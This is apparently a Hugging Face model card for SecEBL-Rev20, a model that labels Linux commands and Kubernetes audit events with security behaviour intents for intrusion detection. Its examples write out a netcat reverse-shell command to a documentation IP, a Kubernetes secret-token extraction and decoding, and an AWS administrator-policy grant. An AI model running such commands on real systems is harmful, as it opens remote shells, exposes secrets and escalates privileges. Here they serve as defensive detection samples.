---
license: apache-2.0
base_model: Alibaba-NLP/gte-modernbert-base
library_name: sentence-transformers
pipeline_tag: sentence-similarity
tags:
- security
- intrusion-detection
- behavior-analytics
- intent-recognition
- linux
- kubernetes
- audit-log
- sentence-transformers
---

# SecEBL-Rev20

**SecEBL** stands for **Security Event Behavior Labeler**.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.

Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)

## At A Glance

| Area | Current release summary |
| --- | --- |
| Stable public API | L1 behavior-intent labeling with ranked `top_labels`. |
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
| Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |

The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.

## First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:

```bash
git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL
git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
pip install -e .
scripts/run_examples.sh
```

After the script finishes, inspect:

```text
runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json
```

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.

## What This Repository Contains

This Hugging Face repository is the model artifact bundle.

| Path | Purpose |
| --- | --- |
| `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
| `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. |
| `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
| `examples/linux/` | Public subset of the internal Linux final benchmark and matching Rev20 labels. |
| `examples/k8s/` | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. |
| `examples/manifest.json` | Public example subset counts and distribution. |
| `rev20_tag_rfc.md` | Rev20 behavior-tag labeling RFC and boundary examples. |
| `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
| `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
| `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
| `LICENSE`, `NOTICE` | Model license and attribution notices. |

This repository does not include the runnable helper scripts. Use [EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.

## Output Shape

L1 predictions expose ranked `top_labels`:

```json
{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}
```

L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection threshold. `behavior_tags[]` is the field used by training and evaluation label files. Runtime prediction output is ranked `top_labels`.

## Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.

SecEBL adds an intermediate representation:

```text
raw security event
  -> L1 behavior-intent recognition
  -> L2 session reasoning or another downstream detector
  -> alert / review / policy
```

L1 intentionally does not decide that a single event is an intrusion.
It produces explainable behavior evidence such as `read_credential_material`, `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`, or `query_service_health`.

This is useful for:

- LOTL / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
- Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
- Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.

## Data And Vocabulary

Rev20 is a flat behavior-tag schema.

| Item | Count |
| --- | ---: |
| Top-level behavior groups | 12 |
| Behavior tags | 361 |

Schema groups:

| Group | Tags |
| --- | ---: |
| `observation_and_discovery` | 51 |
| `configuration_and_log_modification` | 12 |
| `filesystem_and_data` | 33 |
| `execution_and_process` | 28 |
| `network` | 51 |
| `identity_auth_and_secrets` | 31 |
| `persistence_services_and_storage` | 27 |
| `kernel_memory_and_tracing` | 14 |
| `package_build_and_source` | 19 |
| `database_and_infrastructure_services` | 33 |
| `containers_and_cloud_native` | 34 |
| `cloud_control_plane` | 28 |

The release baseline was trained from internal Rev20 corpora:

| Corpus | Rows | Unique behavior tags | Notes |
| --- | ---: | ---: | --- |
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.
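The first-token/tool-form figure is described only as a conservative executable-name estimate; the exact procedure is not documented here. The sketch below shows one way such a count might be computed. It assumes each row is a raw command string, that leading `VAR=value` assignments are skipped, and that paths are reduced to their basename. The helper name `first_tool_form` and the sample commands are hypothetical.

```python
import os
import shlex
from typing import Optional


def first_tool_form(cmdline: str) -> Optional[str]:
    """Return a normalized executable name for a command line, or None."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:
        # Unbalanced quotes: fall back to plain whitespace splitting.
        tokens = cmdline.split()
    for token in tokens:
        # Skip leading environment assignments such as LANG=C.
        name, sep, _ = token.partition("=")
        if sep and name.isidentifier():
            continue
        # Reduce /usr/bin/cat to cat so path variants count once.
        return os.path.basename(token) or None
    return None


# Hypothetical sample rows, not taken from the private corpus.
commands = [
    "cat /root/install.log",
    "/usr/bin/cat /etc/hosts",
    "LANG=C kubectl -n prod get pods",
    "curl -fsS http://127.0.0.1:8080/healthz",
]
distinct_tools = {
    tool for cmd in commands if (tool := first_tool_form(cmd)) is not None
}
print(sorted(distinct_tools))
```

This counts only the first executable of each row, so wrappers such as `sudo` and the later stages of a pipeline are not expanded. That is one reason a count of this kind would be a lower bound.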
## Training Details

The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.

| Item | Value |
| --- | --- |
| Base model | `Alibaba-NLP/gte-modernbert-base` |
| Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches |
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` |
| Epochs | 128 full-pass epochs |
| Batch size | 112 |
| Precision | `fp32` |
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
| Runtime | 58,291 seconds, about 16.2 hours |
| Sequence length | 160 tokens |
| Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` |

Training data scale:

| Training artifact | Count | Notes |
| --- | ---: | --- |
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |

The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.
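The step, warmup, and runtime figures in the training tables can be cross-checked from the pair count and batch size. The short sketch below assumes that steps per epoch are the ceiling of effective pairs over batch size and that warmup steps are the floor of the warmup ratio times total steps. Both are assumptions about the training loop, although they reproduce the documented values.

```python
import math

base_pairs = 117_092        # positive pairs before boundary upsampling
effective_pairs = 118_858   # positive pairs after boundary upsampling
batch_size = 112
epochs = 128
warmup_ratio = 0.06
runtime_seconds = 58_291

# Extra exposures added by upsampling.
extra_pairs = effective_pairs - base_pairs

# Assumed: the last partial batch of each epoch still counts as a step.
steps_per_epoch = math.ceil(effective_pairs / batch_size)
total_steps = steps_per_epoch * epochs

# Assumed: warmup steps are truncated to an integer.
warmup_steps = math.floor(total_steps * warmup_ratio)
runtime_hours = runtime_seconds / 3600

print(extra_pairs, steps_per_epoch, total_steps, warmup_steps, round(runtime_hours, 1))
# prints: 1766 1062 135936 8156 16.2
```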

Hard negatives were designed in two layers, supplemented by boundary upsampling:

- Schema-level negatives: the dataset builder used `schema_hard`, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
- Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.

## Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under `examples/linux/` and normalized Kubernetes AuditLog examples under `examples/k8s/`.

| Public artifact | Rows | Sessions | Notes |
| --- | ---: | ---: | --- |
| `examples/linux/example_sessions.jsonl` | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. |
| `examples/linux/example_gold.rev20.jsonl` | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. |
| `examples/k8s/example_sessions.jsonl` | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. |
| `examples/k8s/example_gold.rev20.jsonl` | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. |

Session-level labels use English enums: `normal_operation` and `intrusion`.

The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage.

## Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.

Evaluation scale:

| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
| --- | ---: | ---: | ---: | ---: |
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |

Retrieval quality:

| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
| --- | ---: | ---: | ---: | ---: |
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.

Internal Linux benchmark tag cardinality:

| Tags per row | Rows |
| --- | ---: |
| 0 | 705 |
| 1 | 8,829 |
| 2 | 1,567 |
| 3 | 901 |
| 4 | 402 |
| 5 | 139 |
| 6+ | 51 |

Top internal Linux benchmark tags:

| Tag | Count |
| --- | ---: |
| `stage_temporary_path` | 987 |
| `inspect_network_state` | 801 |
| `stage_hidden_path` | 655 |
| `inspect_current_identity` | 578 |
| `read_credential_material` | 551 |
| `inspect_system_state` | 481 |
| `inspect_infrastructure_service` | 390 |
| `query_dns_records` | 372 |
| `enumerate_filesystem` | 365 |
| `search_credentials` | 315 |

## Example Outputs

These examples show the user-facing L1 output style. Scores are cosine/retrieval scores after the release prompt profile.
The public helper scripts save top labels in `predictions.jsonl`.

| Event | Top 3 L1 tags | Note |
| --- | --- | --- |
| `nc -e /bin/sh 203.0.113.10 4444` | spawn_reverse_shell 0.811<br>connect_external_service 0.488<br>spawn_bind_shell 0.451 | `-e` is recognized as reverse-shell execution. |
| `nc -v 203.0.113.10 443` | connect_external_service 0.732<br>spawn_reverse_shell 0.503<br>create_reverse_tunnel 0.412 | Connection intent ranks above shell-spawn intent. |
| `cat /root/install.log` | read_business_log 0.641<br>read_system_log 0.431<br>read_workload_logs 0.385 | Log-read semantics dominate. |
| `cat /root/install.conf` | read_infrastructure_config 0.620<br>read_system_config 0.612<br>read_kernel_parameter 0.336 | Config-read semantics dominate. |
| `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | read_cluster_secret 0.730<br>decode_data 0.716<br>read_credential_material 0.363 | K8s secret extraction and decoding. |
| `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | grant_cloud_privilege 0.838<br>modify_cloud_identity_policy 0.535<br>modify_cloud_identity 0.459 | Cloud privilege escalation semantics. |
| `curl -fsS http://127.0.0.1:8080/healthz` | query_service_health 0.840<br>inspect_local_kubernetes_cluster 0.459<br>inspect_container_runtime 0.383 | Local service health check. |

## Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.

Current single-card CUDA recommendation:

| Setting | Value |
| --- | --- |
| Precision | FP16 |
| Attention | SDPA |
| `max_seq_length` | 160 |
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
| Sorting | `sort_by=char` |
| Padding | dynamic, no forced pad alignment |
| Output path | GPU tensor output plus GPU top-k |

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

| Mode | Result |
| --- | ---: |
| Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s |
| Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline |
| `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
| Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s |

Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.

## L2 Artifact

This repository includes an experimental fitted L2 session scorer so the companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1 examples, plus Linux example-session scoring, when this model directory is used as `MODEL_DIR`.

In this release, a **session** is a sequence of events grouped by `session_id`. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as `intrusion` or `normal_operation`, not a replacement for per-command behavior tags.
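To make the session idea concrete, the sketch below groups L1 predictions by `session_id` and derives a few aggregate features of the kind listed above: tag diversity, score statistics, and behavior transitions. It is an illustration under stated assumptions, not the released L2 feature builder. The `session_id` field on each prediction row, the `top_k` cutoff, the feature names, and the sample rows are all hypothetical.

```python
from collections import defaultdict
from statistics import mean


def session_features(predictions, top_k=1):
    """Aggregate per-event L1 top_labels into per-session summary features."""
    by_session = defaultdict(list)
    for row in predictions:
        by_session[row["session_id"]].append(row)

    features = {}
    for session_id, rows in by_session.items():
        # Keep the top_k highest-ranked labels of each event, in event order.
        kept = [row["top_labels"][:top_k] for row in rows]
        tags = [label["label_id"] for labels in kept for label in labels]
        scores = [label["score"] for labels in kept for label in labels]
        # A transition is a change of top-1 label between consecutive events.
        top1 = [labels[0]["label_id"] for labels in kept if labels]
        transitions = sum(a != b for a, b in zip(top1, top1[1:]))
        features[session_id] = {
            "event_count": len(rows),
            "tag_diversity": len(set(tags)),
            "mean_score": mean(scores) if scores else 0.0,
            "transitions": transitions,
        }
    return features


# Hypothetical prediction rows; scores are made up for illustration.
predictions = [
    {"session_id": "s1", "top_labels": [
        {"label_id": "inspect_current_identity", "score": 0.70}]},
    {"session_id": "s1", "top_labels": [
        {"label_id": "read_credential_material", "score": 0.60}]},
    {"session_id": "s2", "top_labels": [
        {"label_id": "query_service_health", "score": 0.84}]},
]
print(session_features(predictions))
```

A downstream classifier such as a logistic regression could consume a feature dictionary like this one. The released artifact's actual features and tag-selection policy are internal and may differ.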

For compatibility with the released L2 artifact, L2 derives its session features from cached L1 `top_labels` using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked `top_labels`, not a selected `behavior_tags` field.

Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.

Internal L2 summary:

| Check | Result |
| --- | ---: |
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
| Out-of-fold (OOF) validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |

The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed.

The included L2 artifact is a research/reproducibility component, not a general production IDS claim.

## Direct SentenceTransformers Loading

You can load the embedding model directly:

```python
from sentence_transformers import SentenceTransformer

model = SentenceTransformer("willchen0011/SecEBL")
```

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from `semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k labels.

For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release.

## Intended Use

- Research and evaluation of security-event behavior labeling.
- Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
- Building session-level risk scoring over SecEBL behavior-label streams.

## Out Of Scope

- Standalone verdicting on a single event.
- Authorization or policy-compliance decisions without human validation.
- Monitoring systems you are not authorized to defend.

## License

This Hugging Face repository is released under **Apache License 2.0**.

The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0.

Source code, schemas, public examples, public documentation, helper scripts, model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file explicitly states otherwise.